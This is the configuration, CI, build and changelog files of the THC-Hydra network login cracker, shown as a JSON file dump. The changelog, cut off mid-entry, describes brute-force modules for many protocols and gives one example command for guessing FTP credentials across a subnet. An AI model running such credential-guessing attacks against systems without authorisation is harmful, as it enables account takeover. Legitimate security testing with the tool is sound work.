[ { "path": ".clang-format", "content": "---\nLanguage: Cpp\nAccessModifierOffset: -2\nAlignAfterOpenBracket: Align\nAlignConsecutiveAssignments: false\nAlignConsecutiveDeclarations: false\nAlignEscapedNewlines: Right\nAlignOperands: true\nAlignTrailingComments: true\nAllowAllParametersOfDeclarationOnNextLine: true\nAllowShortBlocksOnASingleLine: false\nAllowShortCaseLabelsOnASingleLine: false\nAllowShortFunctionsOnASingleLine: All\nAllowShortIfStatementsOnASingleLine: false\nAllowShortLoopsOnASingleLine: false\nAlwaysBreakAfterDefinitionReturnType: None\nAlwaysBreakAfterReturnType: None\nAlwaysBreakBeforeMultilineStrings: false\nAlwaysBreakTemplateDeclarations: false\nBinPackArguments: true\nBinPackParameters: true\nBraceWrapping: \n AfterClass: false\n AfterControlStatement: false\n AfterEnum: false\n AfterFunction: false\n AfterNamespace: false\n AfterObjCDeclaration: false\n AfterStruct: false\n AfterUnion: false\n AfterExternBlock: false\n BeforeCatch: false\n BeforeElse: false\n IndentBraces: false\n SplitEmptyFunction: true\n SplitEmptyRecord: true\n SplitEmptyNamespace: true\nBreakBeforeBinaryOperators: None\nBreakBeforeBraces: Attach\nBreakBeforeInheritanceComma: false\nBreakInheritanceList: BeforeColon\nBreakBeforeTernaryOperators: true\nBreakConstructorInitializersBeforeComma: false\nBreakConstructorInitializers: BeforeColon\nBreakAfterJavaFieldAnnotations: false\nBreakStringLiterals: true\nColumnLimit: 512\nCommentPragmas: '^ IWYU pragma:'\nCompactNamespaces: true\nConstructorInitializerAllOnOneLineOrOnePerLine: false\nConstructorInitializerIndentWidth: 4\nContinuationIndentWidth: 4\nCpp11BracedListStyle: true\nDerivePointerAlignment: false\nDisableFormat: false\nExperimentalAutoDetectBinPacking: false\nFixNamespaceComments: true\nForEachMacros: \n - foreach\n - Q_FOREACH\n - BOOST_FOREACH\nIncludeBlocks: Preserve\nIncludeCategories: \n - Regex: '^\"(llvm|llvm-c|clang|clang-c)/'\n Priority: 2\n - Regex: '^(<|\"(gtest|gmock|isl|json)/)'\n Priority: 3\n - Regex: '.*'\n Priority: 1\nIncludeIsMainRegex: '(Test)?$'\nIndentCaseLabels: false\nIndentPPDirectives: None\nIndentWidth: 2\nIndentWrappedFunctionNames: false\nJavaScriptQuotes: Leave\nJavaScriptWrapImports: true\nKeepEmptyLinesAtTheStartOfBlocks: false\nMacroBlockBegin: ''\nMacroBlockEnd: ''\nMaxEmptyLinesToKeep: 1\nNamespaceIndentation: None\nObjCBinPackProtocolList: Auto\nObjCBlockIndentWidth: 2\nObjCSpaceAfterProperty: false\nObjCSpaceBeforeProtocolList: true\nPenaltyBreakAssignment: 2\nPenaltyBreakBeforeFirstCallParameter: 19\nPenaltyBreakComment: 300\nPenaltyBreakFirstLessLess: 120\nPenaltyBreakString: 1000\nPenaltyBreakTemplateDeclaration: 10\nPenaltyExcessCharacter: 1000000\nPenaltyReturnTypeOnItsOwnLine: 60\nPointerAlignment: Right\nReflowComments: true\nSortIncludes: true\nSortUsingDeclarations: true\nSpaceAfterCStyleCast: false\nSpaceAfterTemplateKeyword: true\nSpaceBeforeAssignmentOperators: true\nSpaceBeforeCpp11BracedList: false\nSpaceBeforeCtorInitializerColon: true\nSpaceBeforeInheritanceColon: true\nSpaceBeforeParens: ControlStatements\nSpaceBeforeRangeBasedForLoopColon: true\nSpaceInEmptyParentheses: false\nSpacesBeforeTrailingComments: 1\nSpacesInAngles: false\nSpacesInContainerLiterals: true\nSpacesInCStyleCastParentheses: false\nSpacesInParentheses: false\nSpacesInSquareBrackets: false\nStandard: Cpp11\nTabWidth: 2\nUseTab: Never\n...\n\n" }, { "path": ".github/ISSUE_TEMPLATE/bug_report.md", "content": "---\nname: Bug report\nabout: Create a report to help us improve\ntitle: ''\nlabels: ''\nassignees: ''\n\n---\n\n**IMPORTANT**\nThis is just for reporting *BUGS* not help on how to hack, how to use hydra, command line options or how to get it compiled. Please search for help via search engines. Issues asking for this here will be closed.\n\n**Describe the bug**\nA clear and concise description of what the bug is.\n\n**To Reproduce**\n * Ensure that you have tested the bug to be present in the current github code. You might be using an outdated version that comes with your Linux distribution!\n * You must provide full command line options.\n\nSteps to reproduce the behavior:\n1. ...\n2. ...\n3. ...\n\n**Expected behavior**\nA clear and concise description of what you expected to happen.\n\n**Screenshots**\nIf applicable, add screenshots to help explain your problem.\nNote that all messages must be in *English*, not in Chinese, Russian, etc.\n\n**Desktop (please complete the following information):**\n - OS: [e.g. Ubuntu 20.04]\n - hydra version [e.g. current github state]\n\n**Additional context**\nAdd any other context about the problem here.\n" }, { "path": ".github/ISSUE_TEMPLATE/feature_request.md", "content": "---\nname: Feature request\nabout: Suggest an idea for this project\ntitle: ''\nlabels: ''\nassignees: ''\n\n---\n\n**IMPORTANT**\nPlease note that hydra is still maintained however not actively developed. If you would like to see specific feature here it it recommended implement it yourself and send a pull request - or look for someone to do that for you :-)\n\n**Is your feature request related to a problem? Please describe.**\nA clear and concise description of what the problem is. Ex. I'm always frustrated when [...]\n\n**Describe the solution you'd like**\nA clear and concise description of what you want to happen.\n\n**Describe alternatives you've considered**\nA clear and concise description of any alternative solutions or features you've considered.\n\n**Additional context**\nAdd any other context or screenshots about the feature request here.\n" }, { "path": ".github/workflows/release.yml", "content": "name: release\n\non:\n push:\n branches: [master, main]\n tags-ignore: ['**']\n paths-ignore: [README, TODO, PROBLEMS]\n pull_request:\n paths-ignore: [README, TODO, PROBLEMS]\n\njobs:\n docker-image:\n name: Build the docker image\n runs-on: ubuntu-20.04\n steps:\n - uses: actions/checkout@v3\n\n - uses: docker/setup-qemu-action@v2\n\n - uses: docker/setup-buildx-action@v2\n\n - uses: docker/login-action@v2\n with:\n username: ${{ secrets.DOCKER_USERNAME }}\n password: ${{ secrets.DOCKER_PASSWORD }}\n\n - uses: gacts/github-slug@v1 # Action page: \n id: slug\n\n - uses: docker/build-push-action@v3 # Action page: \n with:\n context: .\n file: Dockerfile\n push: true\n platforms: linux/amd64, linux/arm64\n# ,linux/arm/v6, linux/arm/v7\n tags: vanhauser/hydra:latest\n \n" }, { "path": ".gitignore", "content": "*~\n*.o\nMakefile\nMakefile.in\nhydra\nhydra.exe\nhydra.restore\nxhydra\nxhydra.exe\nhydra-gtk/INSTALL\nhydra-gtk/Makefile.in\nhydra-gtk/aclocal.m4\nhydra-gtk/autom4te.cache/\nhydra-gtk/compile\nhydra-gtk/config.h\nhydra-gtk/config.h.in\nhydra-gtk/config.log\nhydra-gtk/config.status\nhydra-gtk/configure\nhydra-gtk/depcomp\nhydra-gtk/errors\nhydra-gtk/install-sh\nhydra-gtk/missing\nhydra-gtk/mkinstalldirs\nhydra-gtk/src/.deps/\nhydra-gtk/stamp-h.in\nhydra-gtk/stamp-h1\npw-inspector\npw-inspector.exe\n" }, { "path": ".travis.yml", "content": "language: c\nsudo: required\ndist: trusty\nos:\n - linux\n - osx\narch:\n - amd64\n - ppc64le\ncompiler:\n - clang\n - gcc\nmatrix:\nbefore_install:\n - if [ \"$TRAVIS_OS_NAME\" == \"osx\" ];then brew install libgcrypt; fi\nbefore_script:\n ./configure\nscript:\n - make\n" }, { "path": "Android.mk", "content": "LOCAL_PATH:= $(call my-dir)\ninclude $(CLEAR_VARS)\n\nLOCAL_CFLAGS:= -O3 -DLIBOPENSSL -DLIBIDN -DHAVE_PR29_H -DHAVE_PCRE \\\n -DLIBNCP -DLIBPOSTGRES -DLIBSVN -DLIBSSH -DNO_RINDEX \\\n -DHAVE_MATH_H -DOPENSSL_NO_DEPRECATED -DNO_RSA_LEGACY \\\n -fdata-sections -ffunction-sections \n\nLOCAL_LDFLAGS:=-Wl,--gc-sections\n\nLOCAL_C_INCLUDES:= \\\n\t$(LOCAL_PATH)\\\n\texternal/openssl/include\\\n\texternal/libssh/include\\\n\texternal/libidn/lib\\\n\texternal/subversion/subversion/include\\\n\texternal/apr/include\\\n\texternal/libncp/include\\\n\texternal/libpcre\n\t\nLOCAL_SRC_FILES:= \\\n\tbfg.c\\\n\tcrc32.c\\\n\td3des.c\\\n\thmacmd5.c\\\n\thydra-afp.c\\\n\thydra-asterisk.c\\\n\thydra.c\\\n\thydra-cisco.c\\\n\thydra-cisco-enable.c\\\n\thydra-cvs.c\\\n\thydra-firebird.c\\\n\thydra-ftp.c\\\n\thydra-http.c\\\n\thydra-http-form.c\\\n\thydra-http-proxy.c\\\n\thydra-http-proxy-urlenum.c\\\n\thydra-icq.c\\\n\thydra-imap.c\\\n\thydra-irc.c\\\n\thydra-ldap.c\\\n\thydra-mod.c\\\n\thydra-memcached.c\\\n\thydra-mongodb.c\\\n\thydra-mssql.c\\\n\thydra-mysql.c\\\n\thydra-ncp.c\\\n\thydra-nntp.c\\\n\thydra-oracle.c\\\n\thydra-oracle-listener.c\\\n\thydra-oracle-sid.c\\\n\thydra-pcanywhere.c\\\n\thydra-pcnfs.c\\\n\thydra-pop3.c\\\n\thydra-postgres.c\\\n\thydra-rdp.c\\\n\thydra-redis.c\\\n\thydra-rexec.c\\\n\thydra-rlogin.c\\\n\thydra-rsh.c\\\n\thydra-rtsp.c\\\n\thydra-s7-300.c\\\n\thydra-sapr3.c\\\n\thydra-sip.c\\\n\thydra-smb.c\\\n\thydra-smtp.c\\\n\thydra-smtp-enum.c\\\n\thydra-snmp.c\\\n\thydra-socks5.c\\\n\thydra-ssh.c\\\n\thydra-sshkey.c\\\n\thydra-svn.c\\\n\thydra-teamspeak.c\\\n\thydra-telnet.c\\\n\thydra-vmauthd.c\\\n\thydra-vnc.c\\\n\thydra-xmpp.c\\\n\tntlm.c\\\n\tsasl.c\n\nLOCAL_STATIC_LIBRARIES := \\\n\tlibidn \\\n\tlibncp \\\n\tlibpcre \\\n\tlibpcrecpp \\\n\tlibpcreposix \\\n\tlibpq \\\n\tlibssh \\\n\tlibsvn_client-1 \\\n\tlibapr-1 \\\n\tlibaprutil-1 \\\n\tlibiconv\\\n\tlibneon\\\n\tlibssl_static\\\n\tlibcrypto_static\\\n\tlibmemcached\n\t\t\t\t\t\t\nLOCAL_SHARED_LIBRARIES := \\\n\tlibsqlite\\\n\tlibexpat\n\t\t\t\t\t\nLOCAL_MODULE:= hydra\n\ninclude $(BUILD_EXECUTABLE)\n" }, { "path": "CHANGES", "content": "Changelog for hydra\n-------------------\n\nRelease 9.7-dev\n* GTK3 support for xhydra by elboulangero\n* mongo v2 support (thanks to devjunix)\n\nRelease 9.6\n* freerdp v2 -> v3\n* compile fixes (eg. gcc-15)\n* pop3 capability fix\n* mysql library upgrade\n* http-form fixes\n* postgres custom port support\n* smb better expired support\n* ssh legacy cipher support\n* http 403 support\n! Thanks for all the pull requests!\n\nRelease 9.5\n* many modules did not support -W (all those that used a library for the\n connection). All (or most?) should be fixed now.\n* http-form:\n - The help for http-form was wrong. the condition variable must always be\n the *last* parameter, not the third\n - Proxy support was not working correctly\n* smb2: fix for updated libsmb2 which resulted in correct guessing attempts\n not being detected\n* smtp: break early if the server does not allow authentication\n* rdp: detect more return codes that say a user is disabled etc.\n\n\nRelease 9.4\n* Switched from pcre/pcre3 to pcre2 as pcre/pcre3 will be dropped from Debian\n* Small fix for weird RTSP servers\n* Added \"2=\" optional parameter to http-post-form module to tell hydra that\n a \"302\" HTTP return code means success\n* replaced wait3 with waitpid for better compatability\n\n\nRelease 9.3\n* support Xcode compilation\n* new module: cobaltstrike by ultimaiiii, thank you!\n* fix for ssh to support -M or ip/range\n* fix for rdp to detect empty passwords\n* fix for http-form to no send empty headers\n* fix for http on non-default ports when using with a proxy\n* for vnc/cisco/... protocols that only check for a password, skip host\n after the password is found\n* fix to support IPv6 addresses in -M\n* fix to test all entries in -C files, not exiting after the first found\n* make disappearing targets faster to terminate on\n* added \"make uninstall\"\n\n\nRelease 9.2\n* fix for http-post-form optional parameters\n* enable gcc 10 support for xhydra too :)\n* msys support\n* removed rain mode (-r) because of inefficiency\n* IPv6 support for Host: header for http based modules\n\n\nRelease 9.1\n* rdb: support for libfreerdp3 (thanks to animetauren)\n* new module: smb2 which also supports smb3 (uses libsmbclient-dev) (thanks to Karim Kanso for the module!)\n* oracle: added success condition (thanks to kazkansouh), compile on Cygwin (thanks to maaaaz)\n* rtsp: fixed crash in MD5 auth\n* svn: updated to support past and new API\n* http: now supports F=/S= string matching conditions (thanks to poucz@github)\n* http-proxy: buffer fix, 404 success condition (thanks to kazkansouh)\n* mysql: changed not to use mysql db as a default. if the user has not access to this db auth fails ...\n* sasl: buffer fix (thanks to TenGbps)\n* fixed help for https modules (thanks to Jab2870)\n* added -K command line switch to disable redo attempts (good for mass scanning)\n* forgot to have the -m option in the hydra help output\n* gcc-10 support and various cleanups by Jeroen Roovers, thanks!\n* added .clang-format and formatted all code\n\n\nRelease 9.0\n* rdp: Revamped rdp module to use FreeRDP library (thanks to loianhtuan@github for the patch!)\n* Added memcached module\n* Added mongodb module\n* http: http module now supports a= option to select http authentication type\n* JSON output does now truncate the file if exists.\n* Fixed svn module memory leaks\n* Fixed rtsp module potential buffer overflow\n* Fixed http module DIGEST-MD5 mode\n\n\nRelease 8.9.1\n* Clarification for rdp error message\n* CIDR notation (hydra -l test -p test 192.168.0.0/24 ftp) was not detected, fixed\n\n\nRelease 8.8\n* New web page: https://github.com/vanhauser-thc/thc-hydra\n* added PROBLEMS file with known issues\n* rdp: disabled the module as it does not support the current protocol. If you want to add it contact me\n* ldap: fixed a dumb strlen on a potential null pointer\n* http-get/http-post:\n - now supports H=/h= parameters same as http-form (thanks to mathewmarcus@github for the patch)\n - 403/404 errors are now always registered as failed attempts\n* mysql module: a non-default port was not working, fixed\n* added -w timeout support to ssh module\n* fixed various memory leaks in http-form module\n* corrected hydra return code to be 0 on success\n* added patch from debian maintainers which fixes spellings\n* fixed weird crash on x64 systems\n* many warning fixes by crondaemon\n\n\nRelease 8.6\n* added radmin2 module by catatonic prime - great work!\n* smb module now checks if SMBv1 is supported by the server and if signing is required\n* http-form module now supports URLs up to 6000 bytes (thanks to petrock6@github for the patch)\n* Fix for SSL connections that failed with error:00000000:lib(0):func(0):reason(0) (thanks gaia@github for reporting)\n* Added new command line option:\n -c TIME: seconds between login attempts (over all threads, so -t 1 is recommended)\n* Options put after -R (for loading a restore file) are now honored (and were disallowed before)\n* merged several patches by Diadlo@github to make the code easier readable. thanks for that!\n* merged a patch by Diadlo@github that moves the help output to the invididual module\n\n\nRelease 8.5\n* New command line option:\n -b : format option for -o output file (json only so far, happy for patches supporting others :) ) - thanks to veggiespam for the patch\n* ./configure now honors the CC enviroment variable if present\n* Fix for the restore file crash on some x64 platforms (finally! thanks to lukas227!)\n* Changed the format of the restore file to detect cross platform copies\n* Fixed a bug in the NCP module\n* Favor strrchr() over rindex()\n* Added refactoring patch by diadlo\n* Updated man page with missing command line options\n\n\nRelease 8.4\n! Reports came in that the rdp module is not working reliable sometimes, most likely against new Windows versions. please test, report and if possible send a fix\n* Proxy support re-implemented:\n - HYDRA_PROXY[_HTTP] environment can be a text file with up to 64 entries\n - HYDRA_PROXY_AUTH was deprecated, set login/password in HTTP_PROXY[_HTTP]\n* New protocol: adam6500 - this one is work in progress, please test and report\n* New protocol: rpcap - thanks to Petar Kaleychev \n* New command line options:\n -y : disables -x 1aA interpretation, thanks to crondaemon for the patch\n -I : ignore an existing hydra.restore file (don't wait for 10 seconds)\n* hydra-svn: works now with the current libsvn version\n* hydra-ssh: initial check for password auth support now uses login supplied\n* Fixed dpl4hydra to be able to update from the web again\n* Fixed crash when -U was used without any service (thanks to thecarterb for reporting)\n* Updated default password lists\n* The protocols vnc, xmpp, telnet, imap, nntp and pcanywhere got accidentially long sleep commands due a patch in 8.2, fixed\n* Added special error message for clueless users :)\n\n\nRelease 8.3\n* Support for upcoming OpenSSL 1.1 added. needs testing.\n* Fixed hydra redo bug (issue #113)\n* Updated xhydra for new hydra features and options\n* Some more command line error checking\n* Ensured unneeded sockets are closed\n\nRelease 8.2\n* Added RTSP module, thanks to jjavi89 for supplying!\n* Added patch for ssh that fixes hydra stopping to connect, thanks to ShantonRU for the patch\n* Added new -O option to hydra to support SSL servers that do not suport TLS\n* Added xhydra gtk patche by Petar Kaleychev to support modules that do not use usernames\n* Added patch to redis for initial service checking by Petar Kaleychev - thanks a lot!\n* Added support in hydra-http for http-post (content length 0)\n* Fixed important bug in http-*://server/url command line processing\n* Added SSL SNI support\n* Fixed bug in HTTP Form redirection following - thanks for everyone who reported and especially to Hayden Young for setting up a test page for debugging\n* Better library finding in ./configure for SVN + support for Darwin Homebrew (and further enhanced)\n* Fixed http-form module crash that only occurs on *BSD/OSX systems. Thanks to zdk for reporting!\n* Fixed for SSL connection to support TLSv1.2 etc.\n* Support for different RSA keylengths, thanks to fann95 for the patch\n* Fixed a bug where the cisco-enable module was not working with the password-only logon mode\n* Fixed an out of memory bug in http-form\n* Fixed imap PLAIN method\n* Fixed -x option to bail if it would generate too many passwords (more than 4 billion)\n* Added warning if HYDRA_PROXY_CONNECT environment is detected, that is an outdated setting\n* Added --fhs switch to configure (for Linux distribution usage)\n* ... your patch?\n\n\nRelease 8.1\n* David Maciejak, my co-maintainer moved to a different job and country and can not help with Hydra anymore - sadly! Wish you all the best!\n* Added patch from Ander Juaristi which adds h/H header options for http-form-*, great work, thanks!\n* Fixed the -M option, works now with many many targets :-)\n* -M option now supports ports, add a colon in between: \"host:port\", or, if IPv6, \"[ipv6ipaddress]:port\"\n* Found login:password combinations are now printed with the name specified (hostname or IP), not always IP\n* Fixed for cisco-enable if an intial Login/Password is used (thanks to joswr1te for reporting)\n* Added patch by tux-mind for better MySQL compilation and an Android patches and Makefile. Thanks!\n* Added xhydra gtk patches by Petar Kaleychev to support -h, -U, -f, -F, -q and -e r options, thanks!\n* Added patch for teamspeak to better identify server errors and auth failures (thanks to Petar Kaleychev)\n* Fixed a crash in the cisco module (thanks to Anatoly Mamaev for reporting)\n* Small fix for HTTP form module for redirect pages where a S= string match would not work (thanks to mkosmach for reporting)\n* Updated configure to detect subversion packages on current Cygwin\n* Fixed RDP module to support the port option (thanks to and.enshin(at)gmail.com)\n\n\nRelease 8.0\n! Development moved to a public github repository: https://github.com/vanhauser-thc/thc-hydra\n* Added module for redis (submitted by Alejandro Ramos, thanks!)\n* Added patch which adds Unicode support for the SMB module (thanks to Max Kosmach)\n* Added initial interactive password authentication test for ssh (thanks to Joshua Houghton)\n* Added patch for xhydra that adds bruteforce generator to the GUI (thanks to Petar Kaleychev)\n* Target on the command line can now be a CIDR definition, e.g. 192.168.0.0/24\n* with -M , you can now specify a port for each entry (use \"target:port\" per line)\n* Verified that hydra compiles cleanly on QNX / Blackberry 10 :-)\n* Bugfixes for -x option:\n - password tries were lost when connection errors happened (thanks to Vineet Kumar for reporting)\n - fixed crash when used together with -e option \n* Fixed a bug that hydra would not compile without libssh (introduced in v7.6)\n* Various bugfixes if many targets where attacked in parallel\n* Cygwin's Postgresql is working again, hence configure detection re-enabled\n* Added gcc compilation security options (if detected to be supported by configure script)\n* Enhancements to the secure compilation options\n* Checked code with cppcheck and fixed some minor issues.\n* Checked code with Coverity. Fixed a lot of small and medium issues.\n\n\nRelease 7.6\n* Added a wizard script for hydra based on a script by Shivang Desai \n* Added module for Siemens S7-300 (submitted by Alexander Timorin and Sergey Gordeychik, thanks!)\n* HTTP HEAD/GET: MD5 digest auth was not working, fixed (thanks to Paul Kenyon)\n* SMTP Enum: HELO is now always sent, better 500 error detection\n* hydra main:\n - fixed a bug in the IPv6 address parsing when a port was supplied\n - added info message for pop3, imap and smtp protocol usage\n* hydra GTK: missed some services, added\n* dpl4hydra.sh:\n - added Siemens S7-300 common passwords to default password list\n - more broad searching in the list\n* Performed code indention on all C files :-)\n* Makefile patch to ensure .../etc directory is there (thanks to vonnyfly)\n\n\nRelease 7.5\n* Moved the license from GPLv3 to AGPLv3 (see LICENSE file)\n* Added module for Asterisk Call Manager\n* Added support for Android where some functions are not available\n* hydra main:\n - reduced the screen output if run without -h, full screen with -h\n - fix for IPv6 and port parsing with service://[ipv6address]:port/OPTIONS\n - fixed -o output (thanks to www417)\n - warning if HYDRA_PROXY is defined but the module does not use it\n - fixed an issue with large input files and long entries\n* hydra library:\n - SSL connections are now fixed to SSLv3 as some SSL servers fail otherwise, report if this gives you problems\n - removed support for old OPENSSL libraries\n* HTTP Form module:\n - login and password values are now encoded if special characters are present\n - ^USER^ and ^PASS^ are now also supported in H= header values\n - if you the colon as a value in your option string, you can now escape it with \\: - but do not encode a \\ with \\\\\n* Mysql module: protocol 10 is now supported\n* SMTP, POP3, IMAP modules: Disabled the TLS in default. TLS must now be\n defined as an option \"TLS\" if required. This increases performance.\n* Cisco module: fixed a small bug (thanks to Vitaly McLain)\n* Postgres module: libraries on Cygwin are buggy at the moment, module is therefore\n disabled on Cygwin\n\n\nRelease 7.4.3 FIX RELEASES for bugs introduced in 7.4\n* Quickfix for people who do not have libssh installed (won't compile otherwise)\n* Quickfix for http-get/http-head and irc module which would not run due a new feature.\n* Fix for the ssh module that breaks an endless loop if a service becomes unavailable (thanks to shark0der(at)gmail(dot)com for reporting)\n\n\nRelease 7.4\n* New module: SSHKEY - for testing for ssh private keys (thanks to deadbyte(at)toucan-system(dot)com!)\n* Added support for win8 and win2012 server to the RDP module\n* Better target distribution if -M is used\n* Added colored output (needs libcurses)\n* Better library detection for current Cygwin and OS X\n* Fixed the -W option\n* Fixed a bug when the -e option was used without -u, -l, -L or -C, only half of the logins were tested\n* Fixed HTTP Form module false positive when no answer was received from the server \n* Fixed SMB module return code for invalid hours logon and LM auth disabled\n* Fixed http-{get|post-form} from xhydra\n* Added OS/390 mainframe 64bit support (thanks to dan(at)danny(dot)cz)\n* Added limits to input files for -L, -P, -C and -M - people were using unhealthy large files! ;-)\n* Added debug mode option to usage (thanks to Anold Black)\n\n\nRelease 7.3\n* Hydra main:\n - Added -F switch to quit all targets if one pair was found (for -M)\n - Fixed a bug where hydra would terminate after reporting a successful\n login when an account would accept any password\n - Fixed a bug with very large wordlists (thanks to sheepdestroyer for reporting!)\n - Enhanced the module help\n* configure script:\n - Added fix Oracle library inclusion, thanks to Brandon Archer!\n - Added --nostrip option to prevent binary stripping (requested by Fedora\n maintainer)\n* Added a Makefile patch by the Debian maintainers to support their\n SecurityHardeningBuildFlags for the wheezy build as requested\n* dpl4hydra: added install directory support\n* All code: message cleanups\n* SNMP module\n - originally already supported write and v2 although this was not in the\n module help output. Added :-)\n - added SNMPv3 MD5/SHA1 authentication support, though beta still\n* HTTP module:\n - fixed HTTP NTLM auth session\n - implemented errata fix for HTTP digest md5-sess algorithm\n - set default path to /\n* HTTP Form module:\n - set default path to /\n - support HTTP/1.0 redirects\n - fix failed condition check when pcre is not used\n* IMAP module: fixed auth detection\n* POP3 module: Updated auth and capability detection\n* Oracle module: fixed bad handling\n* Oracle listener module: fixed hash size handling\n* Telnet/Cisco/Cisco-enable modules: support \"press ENTER\" prompts\n* FTP module:\n - Fixed a bug where 530 messages were incorrectly handled\n - Clarification for the usage of ftps\n* Mysql module: added patch from Redhat/Fedora that fixes compile problems\n* Added IDN and PCRE support for Cygwin\n\n\nRelease 7.2\n* Speed-up http modules auth mechanism detection\n* Fixed -C colonfile mode when empty login/passwords were used (thanks to\n will(at)configitnow(dot)com for reporting)\n* The -f switch was not working for postgres, afp, socks5, firebird and ncp,\n thanks to Richard Whitcroft for reporting!\n* Fixed NTLM auth in http-proxy/http-proxy-url module\n* Fixed URL when being redirected in http-form module, thanks to gash(at)chaostreff(dot)at\n* Fix MSSQL success login condition, thanks to whistle_master(at)live(dot)com\n* Fix http form module: optional headers and 3xx status redirect, thx to Gash\n* Fix in configure script for --prefix option, thanks to dazzlepod\n* Update of the dpl4hydra script by Roland Kessler, thanks!\n* Small fix for hydra man page, thanks to brad(at)comstyle(dot)com\n\n\nRelease 7.1\n* Added HTTP Proxy URL enumeration module\n* Added SOCKS4/SOCKS5 proxy support with authentication\n* Added IPv6 support for SOCKS5 module\n* Added -e r option to try the reversed login as password\n* Rewrote -x functionality as the code caused too much trouble (thanks to\n murder.net7(at)gmail.com for reporting one of the issues)\n* Fixed a bug with multiple hosts (-M) and http modules against targets that\n are virtual servers. Well spotted by Tyler Krpata!\n* Fixed SVN IPv6 support and updated deprecated calls\n* Fixed RDP failed child connection returned value and false positive issues\n reported by Wangchaohui, thanks!\n* Fixed restore file functionality, was not working together with -o option\n* Fix in http-form module for bug introduced in 7.0\n* Fixed xhydra specific parameter value for http-proxy module\n* minor enhancements\n\n\nRelease 7.0\n* New main engine for hydra: better performance, flexibility and stability\n* New option -u - loop around users, not passwords\n* Option -e now also works with -x and -C\n* Added RDP module, domain can be passed as argument\n* Added other_domain option to smb module to test trusted domains\n* Small enhancement for http and http-proxy module for standard ignoring servers\n* Lots of bugfixes, especially with many tasks, multiple targets and restore file\n* Fixes for a few http-form issues\n* Fix smb module NTLM hash use\n* Fixed Firebird module deprecated API call\n* Fixed for dpl4hydra to work on old sed implementations (OS/X ...)\n* Fixed makefile to install dpl4hydra (thx @sitecrea)\n* Fixed local buffer overflow in debug output function (required -d to be used)\n* Fixed xhydra running warnings and correct quit action event\n\n\nRelease 6.5\n* Improved HTTP form module: getting cookie, fail or success condition, follow\n multiple redirections, support cookie gathering URL, multiple user defined\n headers\n* Added interface support for IPv6, needed for connecting to link local fe80::\n addresses. Works only on Linux and OS/X. Information for Solaris and *BSD welcome\n* Added -W waittime between connects option\n* The -x bruteforce mode now allows for generated password amounts > 2 billion\n* Fix if -L was used together with -x\n* Fixes for http- modules when the http-...://target/options format was used\n* Fixed a bug in the restore file write function that could lead to a crash\n* Fixed XMPP module jabber init request and challenge response check, thx \"F e L o R e T\"\n* Fix: if a proxy was used, unresolveable targets were disabled. now its fine\n* Fix for service://host/ usage if a colon was used after the URI without a\n port defined\n \n\nRelease 6.4\n* Update SIP module to extract and use external IP addr return from server error to bypass NAT\n* Update SIP module to use SASL lib\n* Update email modules to check clear mode when TLS mode failed\n* Update Oracle Listener module to work with Oracle DB 9.2\n* Update LDAP module to support Windows 2008 active directory simple auth\n* Fix to the connection adaptation engine which would loose planned attempts\n* Fix make script for CentOS, reported by ya0wei\n* Print error when a service limits connections and few pairs have to be tested\n* Improved Mysql module to only init/close when needed\n* Added patch from the FreeBSD maintainers\n* Module usage help does not need a target to be specified anymore\n* Configure script now honors /etc/ld.so.conf.d/ directory\n* Add more SMB dialects\n\n\nRelease 6.3\n* Added patch by Petar Kaleychev which adds nice icons to cygwin hydra files\n* Added patch by Gauillaume Rousse which fixes a warning display\n* New Oracle module (for databases via OCI, for TNS Listener passwd, for SID enumeration)\n* New SMTP user enum module (using VRFY, EXPN or RCPT command)\n* Memory leak fix for -x bruteforcing option reported by Alex Lau\n* Fix for svn module, for some versions it needs one more lib, thanks to the\n Debian team for reporting!\n* Fix ssh module, on connection refused a credential could be lost \n* Fix http-form module, a redirect was not always followed\n* QA on all modules for memory leaks\n* Better gtk detection (to not even try xhydra compilation when its useless)\n* First blant attempt for configuring to x64 systems (Linux and *BSD)\n* Updated network password cracker comparison on the web page (for hydra and new ncrack)\n* Indented all source code\n\n\nRelease 6.2\n* Added a patch by Jan Dlabal which adds password generation bruteforcing (no more password files :-) )\n* Forgot to rename ssh2 to ssh in xhydra, fixed\n* Add support for CRAM-MD5 and DIGEST-MD5 auth to ldap module\n* Fix SASL PLAIN auth method issue\n* Add TLS negotiation support for smtp-auth, pop3, imap, ftp and ldap\n* Added man pages from Debian maintainers\n* Checked Teamspeak module, works on TS2 protocol\n* Add support for SCRAM-SHA1 (RFC 5802), first auth cracker to support it, yeah !\n* New module: XMPP with TLS negotiation and LOGIN, PLAIN, CRAM-MD5, DIGEST-MD5, SCRAM-SHA1 support\n* Add SCRAM-SHA1 auth to IMAP module\n* Add module usage help (-U)\n* Add support for RFC 4013: Internationalized Strings in SASL (\"SASLPrep\") \n* Rename smtpauth module to smtp\n* Add SASL + TLS support for NNTP\n* Bugfix SASL DIGEST-MD5, response could be wrong sometime, mainly on 64bits systems\n* Bugfix rlogin module, some auth failure could not be detected accurately\n* Bugfix rsh module, some auth failure could not be detected accurately\n* New module: IRC is not dead ! use to find general server password and /oper credential\n* Add SSL support for VMware Authentication Daemon module\n* Bugfix CVS module, should work now, why does nobody report this ??\n* Bugfix Telnet module, when line mode is not available\n* Add support for new syntax ://[:][/]\n* Add TLS support for SIP\n* STILL OPEN: Fixed a problem in hydra where a login+pw test was lost when an arm/child was quitting\n\n\nRelease 6.1\n* More license updates for the files for the Debian guys\n* Fix for the configure script to correctly detect postgresql\n* Add checks for libssh v0.4 and support for ssh v1\n* Merge all latest crypto code in sasl files\n* Fix SVN compilation issue on openSUSE (tested with v11.3)\n\n\nRelease 6.0\n* Added GPL exception clause to license to allow linking to OpenSSL - Debian people need this\n* IPv6 support finally added. Note: sip and socks5 modules do not support IPv6 yet\n* Changes to code and configure script to ensure clean compile on Solaris 11,\n OSX, FreeBSD 8.1, Cygwin and Linux\n* Bugfix for SIP module, thanks to yori(at)counterhackchallenges(dot)com\n* Compile fixes for systems without OpenSSL or old OpenSSL installations\n* Eliminated compile time warnings\n* xhydra updates to support the new features (david@)\n* Added CRAM-MD5, DIGEST-MD5 auth mechanism to the smtp-auth module (david@)\n* Added LOGIN, PLAIN, CRAM-(MD5,SHA1,SHA256) and DIGEST-MD5 auth mechanisms to the imap and pop3 modules (david@)\n* Added APOP auth to POP3 module (david@)\n* Added NTLM and DIGEST-MD5 to http-auth module and DIGEST-MD5 to http-proxy module (david@)\n* Fixed VNC module for None and VLC auth (david@)\n* Fixes for LDAP module (david@)\n* Bugfix Telnet module linemode option negotiation using win7 (david@)\n* Bugfix SSH module when max auth connection is reached (david@)\n\n\nRelease 5.9\n* Update for the subversion module for newer 